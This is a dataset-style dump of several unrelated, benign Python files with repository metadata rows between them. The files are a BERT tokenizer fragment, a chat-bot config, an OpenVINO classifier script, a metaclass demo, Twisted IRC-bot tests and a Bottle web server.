encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
return encoded_inputs
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A BERT sequence has the following format:
- single sequence: ``[CLS] X [SEP]``
- pair of sequences: ``[CLS] A [SEP] B [SEP]``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
output = [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
if token_ids_1:
output += token_ids_1 + [self.sep_token_id]
return output
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A BERT sequence
pair mask has the following format: :: 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 | first sequence | second
sequence | If :obj:`token_ids_1` is :obj:`None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `token type IDs <../glossary.html#token-type-ids>`_ according to the given
sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
files = self._tokenizer.model.save(save_directory, name=filename_prefix)
return tuple(files)
| 13,647 | 0 | 165 |
0cc2be9029f380cb58334409d1c247b9e8a6d659 | 1,071 | py | Python | config_example.py | KellyHwong/bronya-bot | 7c7322aa8cd739dcd9af37c195c353221b3ab7f1 | [
"MIT"
] | null | null | null | config_example.py | KellyHwong/bronya-bot | 7c7322aa8cd739dcd9af37c195c353221b3ab7f1 | [
"MIT"
] | null | null | null | config_example.py | KellyHwong/bronya-bot | 7c7322aa8cd739dcd9af37c195c353221b3ab7f1 | [
"MIT"
] | null | null | null | import os
from nonebot.default_config import *
# bot profile
BOT_NAME = "布洛妮娅"
COMMAND_START = {'', '/', '!', '/', '!'}
# paths
PROJECT_BRONYA = os.path.dirname(os.path.abspath(__file__)) # 本文件所在目录
ASSETS = os.path.join(PROJECT_BRONYA, "assets")
DATA = os.path.join(PROJECT_BRONYA, "data")
# super users
SUPERUSERS = [] # e.g., 1234567890
# define group ids
MY_GROUP_IDs = [] # e.g., 123456789
BED_TIME = [0, 8] # 睡觉起始时间,0点到8点
GROUP_TIME_ZONE = {123456789: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo"},
987654321: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo",
"纽约": "America/New_York"}}
# 报时时间设置
GROUP_DAYTIME = {
123456789: {"daytime": (0, 23)}, # all day long
987654321: {"daytime": (9, 23)} # day time
}
# whether -1s every minute
GROUP_MAHA = {123456789: False,
987654321: True}
if __name__ == "__main__":
main()
| 24.340909 | 71 | 0.547152 | import os
from nonebot.default_config import *
# bot profile
BOT_NAME = "布洛妮娅"
COMMAND_START = {'', '/', '!', '/', '!'}
# paths
PROJECT_BRONYA = os.path.dirname(os.path.abspath(__file__)) # 本文件所在目录
ASSETS = os.path.join(PROJECT_BRONYA, "assets")
DATA = os.path.join(PROJECT_BRONYA, "data")
# super users
SUPERUSERS = [] # e.g., 1234567890
# define group ids
MY_GROUP_IDs = [] # e.g., 123456789
BED_TIME = [0, 8] # 睡觉起始时间,0点到8点
GROUP_TIME_ZONE = {123456789: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo"},
987654321: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo",
"纽约": "America/New_York"}}
# 报时时间设置
GROUP_DAYTIME = {
123456789: {"daytime": (0, 23)}, # all day long
987654321: {"daytime": (9, 23)} # day time
}
# whether -1s every minute
GROUP_MAHA = {123456789: False,
987654321: True}
def main():
print(f"PROJECT_BRONYA:{PROJECT_BRONYA}")
if __name__ == "__main__":
main()
| 37 | 0 | 25 |
380f61b2464263e3c92644dd1d6befdfa1b377b4 | 78 | py | Python | graphpype/interfaces/plot_igraph/__init__.py | EtienneCmb/graphpype | f19fdcd8e98660625a53c733ff8e44d60c31bd68 | [
"BSD-3-Clause"
] | null | null | null | graphpype/interfaces/plot_igraph/__init__.py | EtienneCmb/graphpype | f19fdcd8e98660625a53c733ff8e44d60c31bd68 | [
"BSD-3-Clause"
] | null | null | null | graphpype/interfaces/plot_igraph/__init__.py | EtienneCmb/graphpype | f19fdcd8e98660625a53c733ff8e44d60c31bd68 | [
"BSD-3-Clause"
] | null | null | null | from .plots import (PlotIGraphModules,PlotIGraphCoclass,PlotIGraphConjCoclass) | 78 | 78 | 0.897436 | from .plots import (PlotIGraphModules,PlotIGraphCoclass,PlotIGraphConjCoclass) | 0 | 0 | 0 |
b383b24d7695ee83f7198c6a02d42d48db7c4110 | 378 | py | Python | test_classification.py | yas-sim/openvino_open_model_zoo_toolkit | 23b65130e7ecff96c19d9b7d74ac8407096b64fe | [
"Apache-2.0"
] | 11 | 2020-09-22T05:55:49.000Z | 2021-06-17T23:35:17.000Z | test_classification.py | yas-sim/openvino_open_model_zoo_toolkit | 23b65130e7ecff96c19d9b7d74ac8407096b64fe | [
"Apache-2.0"
] | null | null | null | test_classification.py | yas-sim/openvino_open_model_zoo_toolkit | 23b65130e7ecff96c19d9b7d74ac8407096b64fe | [
"Apache-2.0"
] | 1 | 2020-09-22T13:19:53.000Z | 2020-09-22T13:19:53.000Z | import cv2
import open_model_zoo_toolkit as omztk
omz = omztk.openvino_omz()
model = omz.imageClassifier()
img = cv2.imread('resources/car.png')
res = model.run(img)
print(res)
# Example: res = [[479, 'car wheel', 0.5016654], [817, 'sports car, sport car', 0.31316656], [436, 'beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon', 0.06171181]]
| 34.363636 | 198 | 0.719577 | import cv2
import open_model_zoo_toolkit as omztk
omz = omztk.openvino_omz()
model = omz.imageClassifier()
img = cv2.imread('resources/car.png')
res = model.run(img)
print(res)
# Example: res = [[479, 'car wheel', 0.5016654], [817, 'sports car, sport car', 0.31316656], [436, 'beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon', 0.06171181]]
| 0 | 0 | 0 |
b94711acefa35c5a95689bfe650fc1cfad0db15c | 618 | py | Python | week11/examples/metaclass.py | HackBulgaria/Programming-101-Python-2020-Spring | 443446028df7fe78fcdd6c37dada0b5cd8ed3c93 | [
"MIT"
] | 30 | 2020-01-22T17:22:43.000Z | 2022-01-26T08:28:57.000Z | week11/examples/metaclass.py | HackBulgaria/Programming-101-Python-2020-Spring | 443446028df7fe78fcdd6c37dada0b5cd8ed3c93 | [
"MIT"
] | 1 | 2020-01-21T19:50:47.000Z | 2020-03-18T16:18:31.000Z | week11/examples/metaclass.py | HackBulgaria/Programming-101-Python-2020-Spring | 443446028df7fe78fcdd6c37dada0b5cd8ed3c93 | [
"MIT"
] | 7 | 2019-11-28T15:59:16.000Z | 2020-12-05T08:39:02.000Z | from class_decorators import debugmethods
b = B()
b.m()
| 15.073171 | 59 | 0.587379 | from class_decorators import debugmethods
class mytype(type):
def __new__(cls, name, bases, clsdict):
def m(self):
print(self)
print('in m')
clsdict['m'] = m
clsobj = super().__new__(cls, name, bases, clsdict)
return clsobj
class mytype2(type):
def __new__(cls, name, bases, clsdict):
print('mytype2')
clsobj = super().__new__(cls, name, bases, clsdict)
return clsobj
class Base(metaclass=mytype):
pass
class Base2(metaclass=mytype2):
pass
class A(Base2, Base):
pass
class B(A):
pass
b = B()
b.m()
| 324 | 41 | 190 |
ca4d798bbea04611785a378457e19cba2d83a20b | 2,378 | py | Python | network/MySourceFiles/tests/test_talkbackbot.py | dstack4273/new-coder_tutorials | 658344fdeca6ab3957dfe6646e5ac9b75ce07c94 | [
"Zlib"
] | null | null | null | network/MySourceFiles/tests/test_talkbackbot.py | dstack4273/new-coder_tutorials | 658344fdeca6ab3957dfe6646e5ac9b75ce07c94 | [
"Zlib"
] | null | null | null | network/MySourceFiles/tests/test_talkbackbot.py | dstack4273/new-coder_tutorials | 658344fdeca6ab3957dfe6646e5ac9b75ce07c94 | [
"Zlib"
] | null | null | null | from twisted.test import proto_helpers
from twisted.trial import unittest
from talkback.bot import TalkBackBotFactory
QUOTE = "Nobody minds having what is too good for them. ~ Jane Austen"
class FakePicker(object):
"""
Always return the same quote.
"""
| 34.463768 | 81 | 0.62069 | from twisted.test import proto_helpers
from twisted.trial import unittest
from talkback.bot import TalkBackBotFactory
QUOTE = "Nobody minds having what is too good for them. ~ Jane Austen"
class FakePicker(object):
"""
Always return the same quote.
"""
def __init__(self, quote):
self._quote = quote
def pick(self):
return self._quote
class TestTalkBackBot(unittest.SynchronousTestCase):
_channel = "#testchannel"
_username = "tester"
_us = 'tbb'
def setUp(self):
factory = TalkBackBotFactory(
self._channel,
self._us,
'Jane Doe',
FakePicker(QUOTE),
['twss'],
)
self.bot = factory.buildProtocol(('127.0.0.1', 0))
self.fake_transport = proto_helpers.StringTransport()
self.bot.makeConnection(self.fake_transport)
self.bot.signedOn()
self.bot.joined(self._channel)
self.fake_transport.clear()
def test_privmsgNoTrigger(self):
"""Shouldn't send a quote if message does not match any triggers"""
self.bot.privmsg(self._username, self._channel, "hi")
self.assertEqual('', self.fake_transport.value())
def test_privmsgWithTrigger(self):
"""Should send a quote if message matches a trigger"""
self.bot.privmsg(self._username, self._channel, "twss")
self.assertEqual(
'PRIVMSG {channel} :{username}: {quote}\r\n'.format(
channel=self._channel, username=self._username, quote=QUOTE
),
self.fake_transport.value())
def test_privmsgAttribution(self):
"""If someone attributes the bot in public, they get a public response"""
self.bot.privmsg(self._username, self._channel, self._us + ': foo')
self.assertEqual(
'PRIVMSG {channel} :{username}: {quote}\r\n'.format(
channel=self._channel, username=self._username, quote=QUOTE
),
self.fake_transport.value())
def test_privmsgPrivateMessage(self):
"""For private messages, should send quote directly to user"""
self.bot.privmsg(self._username, self._us, "hi")
self.assertEqual(
'PRIVMSG {username} :{quote}\r\n'.format(
username=self._username, quote=QUOTE
),
self.fake_transport.value())
| 500 | 1,534 | 76 |
b349c7b11298b71add2f551a38fd6c57bb8cfcdf | 642 | py | Python | exercise-2-templates/server.py | agdonovan98/web-programming | 210cc49943630364a2a5b1363c658a264966f807 | [
"Unlicense"
] | null | null | null | exercise-2-templates/server.py | agdonovan98/web-programming | 210cc49943630364a2a5b1363c658a264966f807 | [
"Unlicense"
] | null | null | null | exercise-2-templates/server.py | agdonovan98/web-programming | 210cc49943630364a2a5b1363c658a264966f807 | [
"Unlicense"
] | null | null | null | from bottle import route, run, template, debug
# http://localhost:8068/
@route("/")
@route("/hello")
@route("/hello/<name>")
debug(True)
run(host="localhost", port=8068) | 19.454545 | 46 | 0.412773 | from bottle import route, run, template, debug
# http://localhost:8068/
@route("/")
def get_index():
return "Hello!"
@route("/hello")
@route("/hello/<name>")
def get_hello(name="Santa"):
data = {
"holiday":False,
'people':[
{
"name":"Santa",
"title":"Mr"
},
{
"name":"Wendy",
"title":"Ms."
},
{
"name":"Greg",
"title":"Dr."
}
],
}
name = "Santa"
return template("hello", data=data)
debug(True)
run(host="localhost", port=8068) | 425 | 0 | 44 |